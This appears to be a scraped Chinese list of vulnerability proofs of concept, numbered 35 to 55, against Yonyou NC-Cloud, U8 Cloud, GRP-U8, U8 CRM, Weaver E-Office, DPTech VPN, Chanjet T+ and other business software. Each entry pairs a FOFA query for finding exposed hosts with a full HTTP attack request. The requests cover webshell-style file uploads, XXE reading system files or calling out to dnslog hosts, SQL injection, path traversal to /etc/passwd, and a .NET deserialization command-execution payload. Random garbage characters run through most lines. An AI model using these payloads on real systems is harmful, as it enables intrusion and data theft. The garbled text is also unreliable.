/ z+ ~" B Y9 g+ b5 f: H
35. 用友NC-Cloud importhttpscer任意文件上传' d! T5 k. V) r7 O3 g, N: R. O
FOFA:app="用友-NC-Cloud"0 {3 ?8 P; @8 N, `: \% |
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
/ e3 {: _( ~6 A) X! y0 ?1 |& ?Host: 203.25.218.166:8888
Z; B. b" S- q" RUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info6 C" O- n/ Z0 v& D' b2 {$ ^
Accept-Encoding: gzip, deflate) z. _3 u0 B% P5 W/ ~0 |& R3 r
Accept: */*, I R# c n4 x- J/ ^7 Q7 O3 l
Connection: close8 Y( x7 g+ y6 h( r1 D& ~+ h! E- o
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
6 W$ H5 k1 N! F% G, S! U. CContent-Length: 190# `9 i$ x! q3 v/ N' K
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df06 U' g+ S' T; L, A
9 u, J$ ` Z- d, y& z7 M3 l( X
--fd28cb44e829ed1c197ec3bc71748df0
3 _( W6 V, R; A1 _& vContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
+ b/ n1 K \$ y5 D' k2 F) }
6 R/ S4 x- [5 X7 z% t1 l3 u<%out.println(1111*1111);%>
1 I5 C1 z- e& I, O/ n+ X( `! u+ O--fd28cb44e829ed1c197ec3bc71748df0--
1 S3 f0 c& r$ P0 s' J; Y, J4 X. r" ]9 w+ {" V; S% {
) U2 U* d' y+ O6 D/ Y, L# Z
36. 用友NC-Cloud soapFormat XXE2 ~, y& l j0 {8 H+ a
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
7 Z& Y+ P1 i t4 d" ]: Q1 _POST /uapws/soapFormat.ajax HTTP/1.1' O6 E8 z7 u9 V( B7 B
Host: 192.168.40.130:8989
# |3 q& ^; Z. g: U! jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0% }7 R* E% \. ~+ _1 U9 @: R% `
Content-Length: 263% @% N! t8 N3 u6 r0 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
3 R- a) t3 e* z! |! C! a1 g5 JAccept-Encoding: gzip, deflate/ ]0 ^) s) z+ O
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; ^5 l3 n0 l* j8 `3 d& ^
Connection: close8 D6 O5 k9 A) B' v% m
Content-Type: application/x-www-form-urlencoded
+ k/ R; ~2 G. N: @Upgrade-Insecure-Requests: 17 i" `0 c9 h! _, ~6 [! M
6 d# e/ @" Q8 p/ `
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a4 }6 m5 C/ g( S- q, Q: a7 Y1 u
6 x2 {+ o+ G+ u% n& |2 G7 _ O
) r2 z: h/ y; B) O3 H2 l37. 用友NC-Cloud IUpdateService XXE
8 b. M+ F7 r/ o' B7 Y& WFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
( p6 n, P% m2 M3 _POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.19 k$ D8 }: E( m0 T' g9 z9 R9 }! Z
Host: 192.168.40.130:89892 e4 ]4 k! {9 [1 J8 M; \$ N' v# p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
0 x( ~" |/ J% o# y4 ]7 AContent-Length: 421* ^% p: b0 L0 N( |: [
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
4 X7 T5 D& g2 d" n. m" VAccept-Encoding: gzip, deflate
4 Q3 n: J, Y/ \. _Accept-Language: zh-CN,zh;q=0.92 B0 {$ U. @9 L8 u
Connection: close# ^$ J; l+ Q) I( g; i |* U* b* ^
Content-Type: text/xml;charset=UTF-8 j% {5 q9 t& p) M/ h. p
SOAPAction: urn:getResult! D9 D6 r0 Z+ S4 m; _3 t; X; O( e
Upgrade-Insecure-Requests: 1
. t; M! I2 Z1 ]5 f/ s# e4 M4 z
" k) ~0 j* ^* o( b J<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">) t- A2 G0 i! E+ O
<soapenv:Header/>
# A, x5 _2 S: d6 v5 k: Q: h0 Z0 H<soapenv:Body>, D: n" W0 V' n3 M6 z" u" L
<iup:getResult>
6 q! Y8 V0 ~9 v$ Y<!--type: string-->, B' V9 t* E+ U- p
<iup:string><![CDATA[& H% p0 J$ X* D1 J, Y0 K; J% d
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
9 R5 D V. k. H<xxx/>]]></iup:string>1 `3 o7 _* F' a! N6 X; ^8 w/ A7 s
</iup:getResult>, P t& j6 g+ z) _( V& g) k# F8 _
</soapenv:Body>3 ~& Q1 a1 i( M& n& o: b( H8 H
</soapenv:Envelope>
' h0 p, |$ C a) `# y: {
' j- X4 b+ k/ h! i% E' h1 [8 `9 ^
2 g( r, {3 }+ F4 B4 I) e% r2 w. |0 D2 u9 h; |0 F
38. 用友U8 Cloud smartweb2.RPC.d XXE
8 k! ?! K4 _$ [( l( g6 GFOFA:app="用友-U8-Cloud"3 T& S" i# r z: m7 m
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1& ~+ ]" _: z+ A% R! @
Host: 192.168.40.131:8088
. k1 X: t5 @2 S7 u4 g2 N0 GUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
1 Q1 m5 H' e/ H' z4 Z- OContent-Length: 260
( n6 j9 N1 y5 }8 K3 {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
. j/ Y. Q$ m9 w& q4 Q- A Y* \0 UAccept-Encoding: gzip, deflate
- t2 a9 a6 s- Z4 z/ N# ~* PAccept-Language: zh-CN,zh;q=0.9
w' K+ U0 k+ k' B. L5 zConnection: close$ d2 u3 H P5 f/ X% Z5 N6 y
Content-Type: application/x-www-form-urlencoded. F- V, e; J4 h' y( i; @
3 {& N8 m9 \6 U8 X; ^4 A1 [9 i__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
7 h/ p* ^8 A, w& S: d) I
3 o& G4 a4 A+ S+ C3 T3 o
) f$ w! c# k& o! h39. 用友U8 Cloud RegisterServlet SQL注入$ D1 F! V H9 d& j0 u9 i
FOFA:title="u8c"! F0 V0 j1 |6 ^/ \% p- S9 C/ B" _# w
POST /servlet/RegisterServlet HTTP/1.1% |9 Q& x$ Q/ k' m7 ?) x( [( N
Host: 192.168.86.128:8089
' W" T1 n9 r7 K6 [, XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36& e9 [# H0 w6 H
Connection: close
% u5 r G( i1 zContent-Length: 854 B: O5 N# i( a7 z2 i
Accept: */*
# j- {; z! x% z- K$ ]6 lAccept-Language: en
) T) F0 G& e7 l# r8 I1 GContent-Type: application/x-www-form-urlencoded: V# ~" M$ x$ y/ z
X-Forwarded-For: 127.0.0.12 L% Q* j9 D$ }; K3 c. L
Accept-Encoding: gzip0 ]6 d% M& O8 h! R
$ K$ W" h A6 Husercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
" N3 L5 h% b: \) x
/ a" P% i! ^2 H+ [' B+ ]7 n! q& {# h3 f" g5 u
40. 用友U8-Cloud XChangeServlet XXE
1 l, W9 L9 y( H" KFOFA:app="用友-U8-Cloud"& O8 M% f/ ~$ N! I
POST /service/XChangeServlet HTTP/1.1
, e9 N& p% @/ fHost: x.x.x.x9 P t3 H# b2 N; e1 R& ~
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36: v. O: \+ `2 g- Z- Y% O% M
Content-Type: text/xml6 c; r0 E6 e2 V/ t& T, ` `0 J! C
Connection: close
; s* E' [& r# F" [/ S' ~' T. I `
8 ]& @5 J4 S- ~, v& D+ u3 L9 d<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>! i8 w' k7 V2 s9 r! I
9 v* D, J T0 U0 o, O$ y. z
& T' C2 |5 j5 m& n* R- U- t& Q41. 用友U8 Cloud MeasureQueryByToolAction SQL注入: D9 d' {+ j V8 V" Q0 f
FOFA:app="用友-U8-Cloud"3 S4 R7 q: ~% N) L4 w
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
) Z; [5 K1 S! D5 ^( y. mHost:: x, Q i1 h* X. f- z' ^( `7 F0 R. n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15" j# q# [. q( q( V7 w, w
Content-Type: application/json
]5 e r1 S2 i2 i& p& ]Accept-Encoding: gzip
. m! p, \! Q9 H1 VConnection: close
7 E" C2 \/ U Y& o' y2 J. y c- {+ Z: b
4 \0 I( j: l) F
42. 用友GRP-U8 SmartUpload01 文件上传
: R4 e, K* o" Y) U2 v( i gFOFA:app="用友-GRP-U8"
2 N& i- ~) a% d# e T/ ]2 i5 ZPOST /u8qx/SmartUpload01.jsp HTTP/1.1
$ |% M2 ], P# _3 [Host: x.x.x.x2 \( W4 k" K6 w9 h+ J% m& c3 ~. b
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt, R2 n) S# q0 _. k0 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36- p2 a+ ?% W8 ^ p% X ~; @& o: l; e
3 I( n2 }% \3 O( D$ X9 v, c! r; V4 P
PAYLOAD
" Z3 l2 P- \, Y' e$ j% q* Q8 e. M6 e! P ~: G& U. z7 {
' v! _) B% L+ }" M) l
http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml
/ _) d; | B% t- K( `
& u$ k. Y( N8 C43. 用友GRP-U8 userInfoWeb SQL注入致RCE
' [( R; ^1 _1 h* b7 f7 HFOFA:app="用友-GRP-U8"" ^, \. s: B, P4 b
POST /services/userInfoWeb HTTP/1.1) j0 U1 Y0 P& | @9 B* D
Host: your-ip
6 O0 A6 Z. o) H6 T9 B/ KUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
9 H7 W- U0 s* k& B0 u7 ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
) W6 D4 s x, I: T6 c6 }0 {Accept-Encoding: gzip, deflate
4 b* A) e( @; |$ F% I. RAccept-Language: zh-CN,zh;q=0.9
. r3 m# h2 I( WConnection: close
. _# H8 o7 }' x6 w& zSOAPAction:
' o: W% x! g, k( V6 SContent-Type: text/xml;charset=UTF-8
5 ^' \- h7 V+ Q9 P* d+ y
8 ?7 r/ a% V9 P<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">$ w) V3 t F/ e9 G7 H: V; f, b
<soapenv:Header/>
8 C5 c1 T1 [0 z/ m8 {4 M p) W <soapenv:Body>7 P; l s+ X" K2 B0 m+ k/ `
<ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
' m5 a$ ^7 H/ i, J* V( [1 A <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
% V' a2 q" j( v/ g7 U& s ]3 i5 {- D </ser:getUserNameById>
7 Q" ~& y) {- r; {" F' H </soapenv:Body>
1 O, J) u2 K& Q' Z5 @</soapenv:Envelope>
7 @0 ]2 Q6 e2 _# c' P
+ s/ V, R4 v9 _! ?3 R
8 n& M1 j: I( P# C: ]% d& U& ?44. 用友GRP-U8 bx_dj_check.jsp SQL注入
: z) e/ a/ y: d3 }( L) DFOFA:app="用友-GRP-U8"
( W, v4 h" [' ?GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
8 G& i, q& W" L6 R$ bHost: your-ip
5 Z' @' I6 [, S4 t' o4 B" B; cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
0 e. f6 G0 R! P: m m5 CAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 b5 ~5 e8 q0 k1 S4 ?: iAccept-Encoding: gzip, deflate
" x5 A) v( w/ v) r: w" cAccept-Language: zh-CN,zh;q=0.9+ e4 g$ e1 n* p+ s, r8 h
Connection: close
$ z9 G d& ?( P N R( d
" w) U7 c6 v% u
9 o5 ~1 H7 M: m8 D7 @% R- B45. 用友GRP-U8 ufgovbank XXE9 U7 [" z8 d! Q9 ~4 L+ h
FOFA:app="用友-GRP-U8"! i w9 o# h4 X u1 L
POST /ufgovbank HTTP/1.1 e2 n- J4 v; W8 J" y5 z! M/ W/ e
Host: 192.168.40.130:222
1 R' ~/ ^2 A5 y' B9 V# s6 V, H4 B1 N/ uUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0' ~" n4 ]2 } z( [; t( y; z
Connection: close+ K5 \6 k+ T% a! N5 i/ m: L
Content-Length: 161
$ K; M3 r% s. e+ \- yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
5 w! Z" D% |4 r( VAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, y5 a; F G' ?" e" e+ zContent-Type: application/x-www-form-urlencoded
7 r, L8 Q0 o) Y$ Y1 N. D+ a$ ]Accept-Encoding: gzip
" c# y6 k, Y9 d+ d l, d+ ?) R b1 D+ d" I
reqData=<?xml version="1.0"?>$ t+ K( T; Z% d! S( O D( _
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest, C# D! b+ x7 P' A. j
5 M# L) |1 K2 w
, N3 i. J& w% J, j, B, M% v, b
46. 用友GRP-U8 sqcxIndex.jsp SQL注入% s- {+ g6 D* B3 F6 B
FOFA:app="用友-GRP-U8": p7 R9 X6 r' i( }; t: z3 \
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1$ J4 t7 ?9 g5 ~/ r, j: K) h
Host: your-ip5 M2 T# \+ C/ `4 @! Z# Y( P4 c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
9 V* C) G8 k& L& kAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 \" v& t6 P' J0 i# u) r# J. M
Accept-Encoding: gzip, deflate% \" i8 u- n5 G5 K! G
Accept-Language: zh-CN,zh;q=0.9# {1 |7 E2 y1 Y% V2 _# D! U
Connection: close
9 {, m- f: N9 {, N" y, K: _# L8 }
$ P' M& X! C" O5 ?+ d, h% v9 ]
$ U, d+ }: e8 l47. 用友GRP A++Cloud 政府财务云 任意文件读取
5 O0 U) u, y \5 z B4 bFOFA:body="/pf/portal/login/css/fonts/style.css"$ D6 i3 q @* |% m/ A& p
GET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1( h3 ^7 {! G" p$ J
Host: x.x.x.x7 R4 M. z% ?/ d( E" j8 D5 N
Cache-Control: max-age=0
& I2 j2 l8 Q; V0 n0 ?+ U, G$ C' FUpgrade-Insecure-Requests: 1+ K. H8 B/ S2 b2 Q0 b! ^2 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36+ Y6 C3 ?' g) M+ ~+ L. t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
8 f0 O4 h A9 J6 g+ l8 Y5 r- H$ p3 t/ Z' UAccept-Encoding: gzip, deflate, br" Z7 x* d/ ^# y/ @& ]1 u
Accept-Language: zh-CN,zh;q=0.9
( f. F- ] ~( b0 ~% f' Q% iIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT' E6 g3 r8 e$ E- g$ C
Connection: close
6 |1 O' W0 h- l' c0 n* k, S$ h0 s" z/ `% Q0 L$ k; E, G
# ?# v5 @. T0 Z8 m" w
# w: Q8 s- q5 \( r48. 用友U8 CRM swfupload 任意文件上传
0 X F: V! V" R2 ^7 OFOFA:title="用友U8CRM"4 x9 z b9 E2 b0 o( H" v- Y T
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.18 m" ^# ]& i* a0 e0 a2 `
Host: your-ip
3 n0 h \4 U# O8 d: J( d) [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; M6 Q0 m: [+ ]% k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! J j& t% ~5 t \! e1 `# p% o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 `' k! p6 f1 _2 [* R9 M# ]9 M
Accept-Encoding: gzip, deflate9 b# b6 z- U9 \6 G4 B
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
+ D+ H! I+ i) ]! ?2 u------269520967239406871642430066855' R. v# h5 n6 _# U% f2 B3 ^
Content-Disposition: form-data; name="file"; filename="s.php"
- Z0 w/ s; m* i+ z0 S7 ^) P1231, Z1 q2 l( ?$ o
Content-Type: application/octet-stream
% V( p6 o2 X* k" Y1 k/ @; V- t/ M------269520967239406871642430066855
) g4 i7 ]: m! c) T6 cContent-Disposition: form-data; name="upload"# h; e8 ~8 T; K J7 E% j
upload) G- _. n: g6 }# c1 B* @( k
------269520967239406871642430066855--6 k" q$ w3 u- ?3 D! G( Z- {
: ^/ T9 d5 m' I' O8 O, H
* c. P% T7 l1 ?# z9 ]: ]# \) s n( A49. 用友U8 CRM系统uploadfile.php接口任意文件上传
. a" i+ p# B! D b1 @ IFOFA:body="用友U8CRM"
/ v5 z: \1 z8 r" F$ A, t6 s- F
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1 n4 X% _( H$ a# H$ p( {
Host: x.x.x.x
3 V* R- r( `2 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( ~5 `7 Q3 }4 h9 rContent-Length: 329
1 \* p w0 z+ o6 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 k) m2 u( B9 J- }& E4 gAccept-Encoding: gzip, deflate; E! I3 p( p7 j% n( j# h }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 a' X% |/ [$ ?- `5 Z
Connection: close
3 k" v! }, c8 z; Z: m1 _) qContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w c" u; M* u+ t
) y! S+ x* x4 e% {. T
-----------------------------vvv3wdayqv3yppdxvn3w
8 s) y$ Q o; DContent-Disposition: form-data; name="file"; filename="%s.php "$ _5 ^/ q/ ^) T3 J$ X: X5 d# L" A
Content-Type: application/octet-stream
+ y- ]$ W5 \3 X3 {
- N7 k, A' y# ~4 f4 W: B7 uwersqqmlumloqa# R8 M& T6 r ~4 [- q) T
-----------------------------vvv3wdayqv3yppdxvn3w
0 p! Q$ l2 u- j4 L2 M9 w dContent-Disposition: form-data; name="upload"
8 \ m( e. P8 P# D. [/ g. _8 p3 Q
, f( J) o7 o$ H0 i. cupload) X, Q& W- |6 p- P2 S
-----------------------------vvv3wdayqv3yppdxvn3w--
3 f3 J( V0 L# Y7 |- z7 Q
- r+ V! N9 _- A" c R
`, Y- _1 @% H, Jhttp://x.x.x.x/tmpfile/updB3CB.tmp.php& J5 Q# r$ y- {
6 l5 f- g W' w. h) g9 X/ s
50. QDocs Smart School 6.4.1 filterRecords SQL注入
" B) r' g$ ]# p" PFOFA:body="close closebtnmodal"0 @* g/ e F$ E. J) b0 ~
POST /course/filterRecords/ HTTP/1.1* }7 h8 ~, a G8 q6 z4 M: }; C; J) k
Host: x.x.x.x+ w; K& l& |0 B# ^3 ?' Y7 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
+ \$ \2 Z2 l+ M' m9 _4 YConnection: close9 o7 y& \. @& B) @
Content-Length: 224
' b( X; ~# `4 {3 O `7 v0 QAccept: */*
: }5 g, E* p3 T7 j3 q$ BAccept-Language: en
( S* H7 z2 v: YContent-Type: application/x-www-form-urlencoded% A. Y" O) d$ s6 {4 v1 W0 c
Accept-Encoding: gzip; g; r7 Y% T9 r4 q. \3 P) o
?4 s* x4 Q- d b) f& g' b
searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
# a% ^1 _9 x. I/ F9 q4 l) a m" ?7 ^. \# c; P L9 n6 F8 n
( h! x ^# | l) E* f6 e
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, n+ F8 V# n1 A5 P3 m
FOFA:app="云时空社会化商业ERP系统"+ ?& l% A3 r# j
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.11 u: u4 n* s% i/ ?: f
Host: your-ip! G' P, l: L, x9 N, Y# s( S: k
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
+ T9 O" b y) b0 @9 G5 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
: V; V Y' P0 R( S( n4 |9 LAccept-Encoding: gzip, deflate
2 u' O- X0 H, S I# n, sAccept-Language: zh-CN,zh;q=0.9/ G, t1 N2 }8 t5 y1 z ?: `
Connection: close
+ q& N7 a# `3 { o' {7 T+ O$ i1 ` ^" D% H; S$ \4 D
U4 p3 ]* G8 ], x& |
52. 泛微E-Office json_common.php sql注入
" W8 C) t7 G v! f4 J4 XFOFA:app="泛微-EOffice"
* E+ |& }; C. zPOST /building/json_common.php HTTP/1.1' o @2 i* C6 {6 S1 Y$ U# f
Host: 192.168.86.128:8097( {+ V$ o- ?0 c9 r
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 X; X, d& |% y4 ^/ }, z( fConnection: close
; r/ k" w* W$ p. S' ?1 a- n' pContent-Length: 87 M8 p) b' z7 W" g3 {! }
Accept: */*
0 a# G% z3 d% C7 b! F3 w1 \Accept-Language: en0 o8 }' ]) ]0 A, @9 t
Content-Type: application/x-www-form-urlencoded
/ ?; g3 x! p3 P* ?9 e+ z. q3 V ?Accept-Encoding: gzip
$ N6 ]$ a# T$ `% P
7 @3 f# i# C( P. @tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3333 n$ ]% q/ {$ X; z
( [/ Z6 H2 n1 m& o
& b7 N$ r& k: Z' t
53. 迪普 DPTech VPN Service 任意文件上传
- |& d) @. ~. x+ U4 d/ m; mFOFA:app="DPtech-SSLVPN", ~: d. t4 F6 F4 n" e, h
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
9 u1 x/ F) v; u: e3 k6 N4 _! N9 ^) `- m# _* G) ?: X
: G; S& T* M' U' z; E+ C9 H
54. 畅捷通T+ getstorewarehousebystore 远程代码执行. U6 Z u& P. K6 V: O
FOFA:app="畅捷通-TPlus"- G2 O$ r' j3 E% b8 G5 h
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件6 D7 [* k7 H4 G9 _
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
9 `+ I. ?4 {( L% j; n F# u4 y$ u+ N5 z# K
n* g! O0 |/ O
完整数据包
' G& I6 m+ A( u8 F+ |4 a4 cPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
( X7 o1 h& I p) g9 y6 sHost: x.x.x.x4 c; L( C0 N! E3 j: `
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
* e; T5 k5 l7 VContent-Length: 593
5 q9 F9 M$ R) Y
7 j- e# i5 v- O7 u9 U+ L' l{& ^! F3 N) X# O4 q8 N
"storeID":{
4 c% x! }3 L. v; [# Z "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
7 ^$ C" B. M; ~/ I" C "MethodName":"Start", u8 e0 A+ {, F; I: O, P
"ObjectInstance":{
' F7 g) G% B8 l2 `; T* | "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",' x2 L6 X2 d: x4 [' p7 f. M1 J- V
"StartInfo":{
5 s% _4 P# \% e* L# o. f "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
6 l6 J; |; v. P) A: Y; r3 m "FileName":"cmd",
% C' j- l: U# _ "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
& T( S8 H0 }9 B }
! k! ]+ o+ Q9 c+ q4 a7 W! N' ^ }3 D' W: L; d A
}
! I5 v9 j8 J- k: _9 I" j" Q}
. ]1 ~ h# F, T7 M% I. r$ O2 D
1 Z1 k1 ^5 ?2 g: [+ I5 `* j& n* P
) Y# B7 w5 b3 q1 G# D& L$ J1 j第二步,访问如下url [9 T$ X+ J$ D) x) z
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt: x; j! q6 j7 \9 e; t! V
$ q5 B% F1 |# q; H( o5 B: X- R- U3 q1 \: F& A" Q" Y2 d( U
55. 畅捷通T+ getdecallusers信息泄露& {/ L- y: c( v4 R. ^) f% k6 l
FOFA:app="畅捷通-TPlus"
# m% ^1 ^: _6 ~0 B9 s9 ~' m第一步,通过
" F' x2 u( p: P: ]' x/ C. ^/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
- V- X3 B- \8 L# R5 c5 Q第二步,利用获取到的Cookie请求- e6 q- w4 H: h" S4 n5 m \' X. e
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers& v Q( Z) @: W- k* b( Z
0 s; Z) ~4 B7 v5 ^1 V' K& a1 p
